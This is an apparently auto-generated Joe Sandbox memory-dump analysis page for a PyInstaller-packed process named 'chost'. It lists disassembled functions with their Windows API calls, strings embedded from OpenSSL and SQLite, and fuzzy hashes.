Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID:
String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
API String ID: 0-1087561517
Opcode ID: b7739ce2ce003fb2b052b6516dd7c285a11f3665f8b81cd71f1fe9b479121a1c
Instruction ID: a05ff9e6f64c231bdabbaca22db133e4b2d2082f32a32da7af551ffcce14d3b8
Opcode Fuzzy Hash: b7739ce2ce003fb2b052b6516dd7c285a11f3665f8b81cd71f1fe9b479121a1c
Instruction Fuzzy Hash: 30D16B61B0864350FB14AA629961BFA72ADEF81788F984031DD3E47EDFDE3DE5028710

Function 00007FFDF6A426E4 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 256COMMON

Download Yara Rule

Strings

SSL_CTX_use_serverinfo_file, xrefs: 00007FFDF6A6A521, 00007FFDF6A6A562, 00007FFDF6A6A626, 00007FFDF6A6A79C, 00007FFDF6A6A7D2, 00007FFDF6A6A7FB, 00007FFDF6A6A826, 00007FFDF6A6A84A
SERVERINFOV2 FOR , xrefs: 00007FFDF6A6A650
SERVERINFO FOR , xrefs: 00007FFDF6A6A5E6
..\s\ssl\ssl_rsa.c, xrefs: 00007FFDF6A6A52D, 00007FFDF6A6A56E, 00007FFDF6A6A62D, 00007FFDF6A6A69B, 00007FFDF6A6A6F6, 00007FFDF6A6A70F, 00007FFDF6A6A729, 00007FFDF6A6A7A8, 00007FFDF6A6A7DE, 00007FFDF6A6A802, 00007FFDF6A6A832, 00007FFDF6A6A856, 00007FFDF6A6A878, 00007FFDF6A6A88E, 00007FFDF6A6A8A4, 00007FFDF6A6A8BA

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID:
String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
API String ID: 0-2528746747
Opcode ID: b7f3cfd17a60fa33393e94fedb923a5697f560e55c10e3887d0c589b80078274
Instruction ID: 28b9a73a002132cd13809011cf401f8bca3594f15259fce262c1eef37c6c3711
Opcode Fuzzy Hash: b7f3cfd17a60fa33393e94fedb923a5697f560e55c10e3887d0c589b80078274
Instruction Fuzzy Hash: 7AB17F61B08A8285FB14AB62D861ABDB769BF81784F404132DE3D47EDEDF3DE6058350

Function 00007FF69436DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDBD
GetLastError.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE63
GetProcAddress.KERNEL32(?,?,?,00007FF69436DFEA,?,?,?,00007FF69436DCDC,?,?,?,00007FF69436D8D9), ref: 00007FF69436DE6F

Strings

api-ms-, xrefs: 00007FF69436DDDD

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 4e51e24897ab5e689e34f907e73ef028a1fa941d7c3d74bd6b039c1a6f81117a
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 4131CD21B2A64391EE32DB23A8825B57394FF58BA0F598579ED1D8B394EF3CE444C314

Function 00007FF694362A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF69436351A,?,00000000,00007FF694363F23), ref: 00007FF694362AA0

Strings

0, xrefs: 00007FF694362B16
Warning [ANSI Fallback], xrefs: 00007FF694362B0F
Warning, xrefs: 00007FF694362B1E
[PYI-%d:%s] , xrefs: 00007FF694362AA8
WARNING, xrefs: 00007FF694362AAF

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 6df2a56c3738d86e5d6a339276a50b68680bbf87c9199da9b85550d10549a381
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 15217172A1978292E6309B62B8817EA73A4FB88784F40417AFE8CC3759DF7CD545C740

Function 00007FF694368760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF694368780
OpenProcessToken.ADVAPI32 ref: 00007FF694368793
GetTokenInformation.ADVAPI32 ref: 00007FF6943687B8
GetLastError.KERNEL32 ref: 00007FF6943687C2
GetTokenInformation.ADVAPI32 ref: 00007FF694368802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
CloseHandle.KERNEL32 ref: 00007FF694368836

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: 9af662ae11957c42ee49bd39f2cb39d3d3b47e81e672457a31fff84a219f86f5
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 5A212131A0C64342EA249B76F4D522AB7A0EB857E4F108279E6ADC3BE5DF6CD445C740

Function 00007FF69437B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF69437B1CF
FlsGetValue.KERNEL32 ref: 00007FF69437B1E4
FlsSetValue.KERNEL32 ref: 00007FF69437B205
FlsSetValue.KERNEL32 ref: 00007FF69437B232
FlsSetValue.KERNEL32 ref: 00007FF69437B243
FlsSetValue.KERNEL32 ref: 00007FF69437B254
SetLastError.KERNEL32 ref: 00007FF69437B26F

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction ID: dfac49619780feb5d93848e7621fc4e5cfc3faa2b3d635ae4d3be7712b64e3f3
Opcode Fuzzy Hash: 7a7efe5704aebd884d83a549bac9021180a30b6e3a5084d39c82c78793c2ea5e
Instruction Fuzzy Hash: F8211630A0E246C1FA7467739AD213D5162DF447A4F14C7BCEABED6AD6DE2CA441C300

Function 00007FF694387DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF694387E0D
GetLastError.KERNEL32 ref: 00007FF694387E19
CloseHandle.KERNEL32 ref: 00007FF694387E31
CreateFileW.KERNEL32 ref: 00007FF694387E5C
WriteConsoleW.KERNEL32 ref: 00007FF694387E7B

Strings

CONOUT$, xrefs: 00007FF694387E3D

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 89c7e07bea03e281a3f6895b136475e7b3b963054bbb9bbe71837d890f7d4b54
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 5A119621718A4286E7609B63E8D5329E2A0FB88FE4F148278E95DC77A4DF3CD804C740

Function 00007FFDF6A42310 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 391COMMON

Download Yara Rule

APIs

00007FFE1FFB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDF6AA808D

Strings

..\s\ssl\statem\statem_clnt.c, xrefs: 00007FFDF6AA8024, 00007FFDF6AA80AB, 00007FFDF6AA80C7, 00007FFDF6AA82DE, 00007FFDF6AA837D, 00007FFDF6AA83FA, 00007FFDF6AA8444, 00007FFDF6AA8476
SHA2-256, xrefs: 00007FFDF6AA825C
tls_process_new_session_ticket, xrefs: 00007FFDF6AA801D, 00007FFDF6AA82D2, 00007FFDF6AA8371, 00007FFDF6AA843D
resumption, xrefs: 00007FFDF6AA83AA

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\statem_clnt.c$SHA2-256$resumption$tls_process_new_session_ticket
API String ID: 3568877910-1635961163
Opcode ID: 04e8e58095ab4c29acf9aa88931abc93738d81869fce6a6a0b8aecbe2d7fc96d
Instruction ID: 3b277cf4e87799b1140748ed80967c0092e94524bcd0e71f18d5b878775d506b
Opcode Fuzzy Hash: 04e8e58095ab4c29acf9aa88931abc93738d81869fce6a6a0b8aecbe2d7fc96d
Instruction Fuzzy Hash: E6029E32B09B8281E7509B15E460BBD77A8FB84B84F548136EAAD4BBD9DF3CE545C700

Function 00007FF694368560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF694369216), ref: 00007FF694368592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943685E9

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF694368678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF6943686F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF694369216), ref: 00007FF69436870A

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction ID: 1d260c8d88df7c3960d56c470f4246ca93e34f8170f56d9695635efa69ddb558
Opcode Fuzzy Hash: af5051bae1bb50e3ccf69b50d5ac14561a54b739df452b641c0904f08e36c6c8
Instruction Fuzzy Hash: 00418462B1968381E6349B33A5816AA7394FF88BC8F458179DF8DD7B89DE3CE501C700

Function 00007FFDF70B6750 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 338COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70B68E2
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70B6B6E

Strings

unknown column "%s" in foreign key definition, xrefs: 00007FFDF70B6AFE
foreign key on %s should reference only one column of table %T, xrefs: 00007FFDF70B67D5
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDF70B67FE

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 2636501453-272990098
Opcode ID: cf17cd173f1e0b57c51c08f832a2cc0fc0c966b1dd8d6c2570c7d36062597e18
Instruction ID: 43314256986ca9db73a81670f7f77406baf161e368d754af24813d571a44db8c
Opcode Fuzzy Hash: cf17cd173f1e0b57c51c08f832a2cc0fc0c966b1dd8d6c2570c7d36062597e18
Instruction Fuzzy Hash: C1D1BE6AB0978182EB208B199064EF96BB2EF55B84F448135EE6DC37C9DF3CE641D300

Function 00007FFDF70755B0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 314COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7075965
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF707597A

Strings

%s at line %d of [%.10s], xrefs: 00007FFDF707560D
database corruption, xrefs: 00007FFDF7075601
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDF70755F5

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2636501453-3727861699
Opcode ID: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
Instruction ID: 3e7688bf8fce7e8bf08598d788a6c4d7466d589ef8e8fbc4da31962c7ad01f01
Opcode Fuzzy Hash: 3fa76793ff51000907a4173b9cd8982be06d5e4031eb3370abfe8fd6ce14fdfa
Instruction Fuzzy Hash: 4FD19B7AB0868586DB60CF29E064AE9B3B5FF84B84F554032DE5D87798EF38D842D740

Function 00007FF6943690E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF694368760: GetCurrentProcess.KERNEL32 ref: 00007FF694368780
Part of subcall function 00007FF694368760: OpenProcessToken.ADVAPI32 ref: 00007FF694368793
Part of subcall function 00007FF694368760: GetTokenInformation.ADVAPI32 ref: 00007FF6943687B8
Part of subcall function 00007FF694368760: GetLastError.KERNEL32 ref: 00007FF6943687C2
Part of subcall function 00007FF694368760: GetTokenInformation.ADVAPI32 ref: 00007FF694368802
Part of subcall function 00007FF694368760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69436881E
Part of subcall function 00007FF694368760: CloseHandle.KERNEL32 ref: 00007FF694368836

LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF69436916C
LocalFree.KERNEL32(?,00007FF694363C55), ref: 00007FF694369175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF694369142
D:(A;;FA;;;%s), xrefs: 00007FF694369157
S-1-3-4, xrefs: 00007FF694369121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF694369183

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: 835401d8814f9f9f324a306e95aec387caf947763fc2ced7ac8516c4d305421c
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 84214F21A1874382F724AB32E9962EA7365FF88780F5480B9EA4DD3796DF3CD845C740

Function 00007FF69437B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B347
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B37D
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3CC
SetLastError.KERNEL32(?,?,?,00007FF694374F81,?,?,?,?,00007FF69437A4FA,?,?,?,?,00007FF6943771FF), ref: 00007FF69437B3E7

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: e0e660be6139aedb7bc65fd876fe121ba12b3255fe05e402be53fa66be4464bb
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: 14111530A0C642C2FA74A7739AD113D6192EF447A4F14C7BCE9AED67D6DE2CA481C701

Function 00007FFDF7078670 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 211COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF707882C
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7078931

Strings

%s at line %d of [%.10s], xrefs: 00007FFDF7078726
database corruption, xrefs: 00007FFDF707871F
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDF707870C

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$database corruption
API String ID: 2636501453-3727861699
Opcode ID: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
Instruction ID: 0f6ad4dd4a2f7855670b46361c2943020b7923517159793d345ce6fa227664f4
Opcode Fuzzy Hash: 67dc44a78d9e748f69a167c79ebf504151bc07e9d0180a1d626db382376bfe5e
Instruction Fuzzy Hash: D791D466B082C196D755CB26E5A0AFD7BA0FB40744F088136DBAD876C9DF3CE4A6D700

Function 00007FF694362910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

